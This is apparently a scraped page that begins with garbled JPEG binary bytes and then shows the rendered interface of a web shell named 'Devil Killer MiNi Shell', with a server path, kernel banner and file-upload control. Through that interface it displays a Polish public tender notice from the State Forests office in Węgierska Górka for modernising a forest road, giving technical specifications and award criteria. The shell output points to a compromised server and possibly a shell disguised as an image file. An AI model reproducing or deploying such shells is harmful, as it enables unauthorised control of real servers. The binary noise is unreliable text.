JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240730/0043627601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa - modernizacja stałego szlaku zrywkowego Na Wojtatówkę </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Węgierska Górka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 071001984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zielona 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Węgierska Górka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">338641214</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">338641481</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wegierska@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/nadlesnictwo-wegierska-gorka</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa - modernizacja stałego szlaku zrywkowego Na Wojtatówkę </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f912cc2f-9bc8-4f1c-be4b-87cc1ae411f6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00436276</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00351529/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa drogi &#34;Na Wojtatówkę&#34; w leśnictwie Prusów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f912cc2f-9bc8-4f1c-be4b-87cc1ae411f6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia („Platforma”), która jest dostępna pod adresem:<br/>https://ezamowienia.gov.pl oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu<br/>Platformy.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>podmiotu „Wykonawca” na Platformie. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy, w tym minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług<br/>Platformy oraz informacje dotyczące specyfikacji połączenia określa „Regulamin korzystania z Platformy e-Zamówienia”, dostępny<br/>pod adresem: https://ezamowienia.gov.pl/pl/regulamin/ oraz informacje zamieszczone na stronie Platformy w zakładce „Centrum<br/>Pomocy”.<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji dotyczącej niniejszego postępowania nie wymaga posiadania konta na<br/>Platformie ani logowania.<br/>5. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowanie) musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 r., poz. 2452).<br/>6. Dokumenty elektroniczne wymienione w SWZ, o których mowa w §2 ust. 1 rozporządzenia wskazanego w pkt 10.6. SWZ<br/>sporządza się w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych<br/>Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz. 2247 z późn. zm.), z uwzględnieniem<br/>rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>Wymagane w SWZ informacje, oświadczenia lub dokumenty, inne niż wymienione w §2 ust. 1 rozporządzenia wskazanego w pkt<br/>10.6. SWZ, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a)w formatach danych określonych w przepisach rozporządzenia w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych (i przekazuje się jako załącznik), lub<br/>b)jako tekst wpisany bezpośrednio do widomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>7. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert):<br/>a)Komunikacja w postępowaniu (z wyłączeniem składania ofert), odbywa się drogą elektroniczną za pośrednictwem formularzy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia<br/>27 kwietnia 2016r w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1, ze zm.), dalej „RODO”, informuję, że:<br/>- Administratorem Pani/Pana danych osobowych Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Węgierska<br/>Górka; (Kontakt do Inspektora Ochrony Danych: CompNet Sp.z o.o. , ul. Leszczynowa 33A, 62-500 Konin, iod@comp-net.pl.);<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonego przez Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r – Prawo zamówień publicznych (Dz. U. z 2021r, poz. 1129, ze zm.),<br/>dalej „ustawa Pzp”; dane mogą być udostępniane podmiotom współfinansującym realizację przedmiotu niniejszego postępowania<br/>o udzielenie zamówienia publicznego;- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania danych wynikają z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, nie przewiduje się<br/>profilowania danych osobowych, stosowanie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; jednak jeśli wykonanie obowiązków, o<br/>których mowa w art. 15 RODO wymagałoby niewspółmiernie dużego wysiłku zgodnie z art. 75 ustawy Pzp zamawiający może<br/>żądać, od osoby której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności<br/>podania nazwy lub daty postępowania lub daty zakończonego postępowania o udzielenie zamówienia publicznego;<br/>• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych; zgodnie<br/>z art. 76 ustawy Pzp skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; zgodnie z art. 74 ust. 3 w przypadku gdy wniesienie żądania dotyczącego<br/>prawa, o którym mowa w art. 18 ust. 1 rozporządzenia RODO, spowoduje ograniczenie przetwarzania danych osobowych zawartych<br/>w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia RODO;;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>Pozotsałe postanowienia w w zakresie RODO zawiera ROZDZIAŁ XXI pkt.16 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.4.2024.PG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS STANU ISTNIEJĄCEGO<br/>W stanie istniejącym szlak zrywkowy pełni funkcje związane z gospodarką leśna.<br/>Jezdnia posiada nawierzchnie asfaltową, która jest w złym stanie technicznym, występują<br/>spękania podłużne, poprzeczne oraz ubytki mas.<br/>Przedmiotowy szlak jest drogą jednopasową, dwukierunkową. Szerokość jezdni wynosi<br/>w przedziale około 3,00 do 3,50m. Szlak posiada pochylenie podłużne od 5,00% do 14,50%<br/>oraz pochylenie poprzeczne jednostronne ~2,0%. W stanie istniejącym wody opadowe<br/>odprowadzone są poprzez spadki podłużne i poprzeczne poza jezdnię.<br/><br/>OPIS STANU PROJEKTOWANEGO<br/>1. Rozwiązania sytuacyjno-wysokościowe<br/>Po przebudowie/modernizacji istniejący szlak zrywkowy będzie pełnił funkcje drogi<br/>leśnej. Jej przebieg został dostosowany do przebiegu istniejącej drogi. Początek drogi leśnej<br/>nr 1 stanowi połączenie z istniejącą drogą leśną w km 0+000,00 a jego koniec stanowi<br/>granica działki 5734 w km 0+388,77. W km ok 0+205,00 droga leśna nr 1 rozgałęzia się na<br/>odcinek nr 2, który kończy się w km 0+060,74 na granicy działki nr 5728.<br/>Po remoncie szlak zrywkowy będzie pełnił funkcje drogi leśnej<br/>W przekroju poprzecznym droga leśna nr 1 i nr 2 będzie posiadała jedną jezdnię<br/>szerokości 4,00m umożliwiającą ruch w obu kierunkach. Na łukach poziomych zastosowano<br/>poszerzenie jezdni, których szerokości zależna jest od promienia łuku i wynosi 0,30m.<br/>W km ok 0+120,00 (strona prawa) oraz w km 0+270,00 (strona lewa) zaprojektowano<br/>mijanki na długości 23m zapewniające „schowanie” jednego zestawu transportowego.<br/>Szerokości jezdni wraz z mijanka wynosi 6,00m. Skos wjazdowy i wyjazdowy zaprojektowano<br/>na długości 17,5m (1:7).<br/>Połączenie drogi leśnej (na początku opracowania) z istniejącą droga leśna wykonano<br/>za pomącą łuków o promieniu R = 5,00m. Na rozgałęzieniu drogi leśnej nr 1 z drogą leśną<br/>nr 2 zastosowano łuki o promieniu R = 3,00m oraz 20,00m. W km 0+140,00; 0+238,0 oraz<br/>0+343,04 zaprojektowano wodo spusty usytuowane prostopadle do drogi w celu sprawnego<br/>przeprowadzenia wód opadowych spływających grawitacyjnie ze zboczy.<br/>2. Parametry techniczne<br/>a) Droga leśna nr 1<br/>- Rodzaj drogi leśnej – boczna, dojazdowa,<br/>- prędkość projektowa Vp – 30 km/h ,<br/>- szerokość jezdni – 4,00 m,<br/>- szerokość poboczy – 0,75 m,<br/>- pochylenie poboczy – 6,00 %,<br/>- pochylenie poprzeczne jezdni:<br/>o na prostej - jednostronne - 2.0%,<br/>o na łuku - jednostronne - 2.0%,<br/>- rodzaj nawierzchni drogi – mieszanka mineralno - asfaltowa,<br/>b) Droga leśna nr 2<br/>- Rodzaj drogi leśnej – boczna, dojazdowa,<br/>- prędkość projektowa Vp – 30 km/h ,<br/>- szerokość jezdni – 4,00 m,<br/>- szerokość poboczy – 0,75 m,<br/>- pochylenie poboczy – 6,00 %,<br/>- pochylenie poprzeczne jezdni jednostronne - 2.0%,<br/>- rodzaj nawierzchni drogi – mieszanka mineralno - asfaltowa,<br/>3. Odwodnienie<br/>Odwodnienie jezdni dróg zostanie zapewnione poprzez nadanie odpowiednich<br/>spadków podłużnych i poprzecznych zgodnie z ukształtowaniem dróg poza jezdnie.<br/>4. Założenia przyjęte do obliczeń konstrukcji<br/>W projekcie zakłada się budowę nowej konstrukcji nawierzchni dróg leśnych.<br/>5. KONSTRUKCJA NAWIERZCHNI<br/>5.1. Nawierzchnia drogi leśnej nr 1 i 2<br/>a. Warstwa ścieralna z mieszanki mineralno - asfaltowej – 0.04 m<br/>b. Warstwa podbudowy zasadniczej z kruszywa naturalnego<br/>stabilizowanego mechanicznie – 0.20 m<br/>Grubość konstrukcji Gk = 0.24 m<br/>Wszystkie warstwy konstrukcyjne należy starannie zagęścić sprawdzając ich stopień<br/>zagęszczenia zgodnie z obowiązującymi normami. Pobocza należy wykonać jako gruntowe.<br/>6. ROBOTY ZIEMNE<br/>Wykonawca robót zobowiązany jest do monitorowania warunków gruntowowodnych<br/>w trakcie realizacji robót. Prace należy prowadzić w taki sposób aby uniemożliwić<br/>pogorszenie istniejących parametrów geotechnicznych gruntów. Należy uniemożliwić<br/>gromadzenie się wód opadowych w wykopach podczas wykonywania robót ziemnych.<br/>Grunty z wykopów nie nadające się do ponownego wbudowania należy wywieźć<br/>i zutylizować lub zagospodarować we własnym zakresie. Grunty z wykopów nadające się do<br/>ponownego wbudowania należy złożyć na odkład a po wykonaniu innych prac ponownie<br/>wbudować.<br/>Roboty ziemne należy wykonywać zgodnie z PN-S-02205:1998. Przed ułożeniem<br/>warstw konstrukcyjnych nawierzchni, czyli przed przystąpieniem do robót drogowych należy<br/>wykonać odwodnienie koryta, grunt rodzimy w korycie (w wykopie) należy zagęścić<br/>np. ciężkim walcem wibracyjnym (przez co najmniej ośmiokrotny przejazd) do Is=1,0 i zbadać<br/>wyjściową nośność podłoża (przy pomocy płyty VSS lub ugięciomierzem dynamicznym).<br/>Zagęszczenie warstwy<br/><br/>CPV 45000000-7 Roboty budowlane<br/>CPV 45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne<br/>CPV 45112730-1 Roboty w zakresie kształtowania dróg i autostrad<br/>CPV 45222000-9 Roboty budowlane w zakresie robót inżynieryjnych, z wyjątkiem mostów, tuneli, szybów i kolei podziemnej<br/>CPV 45223500-1 Konstrukcje z betonu zbrojonego<br/>Lokalizacja:<br/>Leśnictwo: Prusów<br/>Oddział: 95a<br/>Miejscowość: Żabnica<br/>Gmina: Węgierska Górka </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie podlegają tylko oferty niepodlegające odrzuceniu.<br/>Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich wagę:<br/>Cena oferty (C) – waga 60 %<br/>Gwarancja i rękojmia za wady na przedmiot zamówienia (G) – waga 40 %<br/>„Okres rękojmi i gwarancji” oznacza, iż okres gwarancji jest równy okresowi rękojmi.)<br/>1) Kryterium: cena oferty (C)<br/>Dla porównania ofert pod względem kryterium cenowego Zamawiający przyjmuje cenę ofertową brutto podaną w Formularzu<br/>ofertowym.<br/>Maksymalna ilość punktów, która może zostać przyznana Wykonawcy w kryterium cena oferty to<br/>60 punktów.<br/>Oferta wypełniająca w najwyższym stopniu wymagania tego kryterium, otrzyma maksymalną ilość punktów, czyli 60 pkt. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza liczba punktów, obliczona wg<br/>poniższego wzoru, zastosowanego do obliczania punktowego:<br/>Cn<br/>------ x 100 x 60% = liczba punktów C<br/>Cx<br/>gdzie: Cn – najniższa zaoferowana cena<br/>Cx – cena zaoferowana w badanej ofercie<br/>liczba 100 – jest to mnożnik zastosowany w celu uzyskania ilości punktów w liczbach<br/>60% – procentowe znaczenie kryterium: ceny oferty (waga 60%).<br/>2) Kryterium: Gwarancja i rękojmia za wady na przedmiot zamówienia (G)<br/>Maksymalna ilość punktów, która może zostać przyznana Wykonawcy w tym kryterium to 40 punktów.<br/>Minimalny wymagany przez Zamawiającego okres gwarancji i rękojmi za wady na przedmiot zamówienia wynosi 36 miesięcy od daty<br/>odbioru końcowego przedmiotu zamówienia. Okres gwarancji i rękojmi należy zadeklarować w pełnych miesiącach, od dnia<br/>podpisania protokołu odbioru końcowego przedmiotu zamówienia. W ramach niniejszego kryterium Zamawiający żąda od<br/>Wykonawcy zrównania okresu gwarancji z okresem rękojmi za wady.<br/>Zamawiający przyzna punktację za powyższe kryterium w następujący sposób:<br/>Gwarancja i rękojmia w miesiącach Liczba punktów<br/>36 – 47 0<br/>48 – 59 20<br/>60 i wyżej 40<br/>Wykonawca w Formularzu ofertowym (załącznik nr 1 do SWZ) określi okres gwarancji i rękojmi za wady na przedmiot zamówienia.<br/>a). Kryterium gwarancji i rękojmi na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu<br/>ofertowym okresu gwarancji.<br/>b). Najdłuższy możliwy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 60 miesięcy.<br/>d). Jeżeli wykonawca wpisze okres gwarancji i rękojmi krótszy niż 36 miesięcy lub nie wypełni w formularzu ofertowym stosownej<br/>rubryki to nie zostaną mu przyznane punkty w tym kryterium.<br/>4) Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, będącą sumą punktów przyznanych w obu<br/>kryteriach (C+G).<br/>5) Punkty obliczane będą z dokładnością do dwóch miejsc po przecinku.<br/>6) Jeśli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przestawiać będzie taki sam bilans<br/>ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę, która otrzyma najwyższą ocenę w<br/>kryterium o najwyższej wadze (tj. cena oferty).<br/>Jeżeli oferty otrzymają taka samą ocenę w kryterium „cena oferty”, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do<br/>złożenia w wyznaczonym terminie ofert 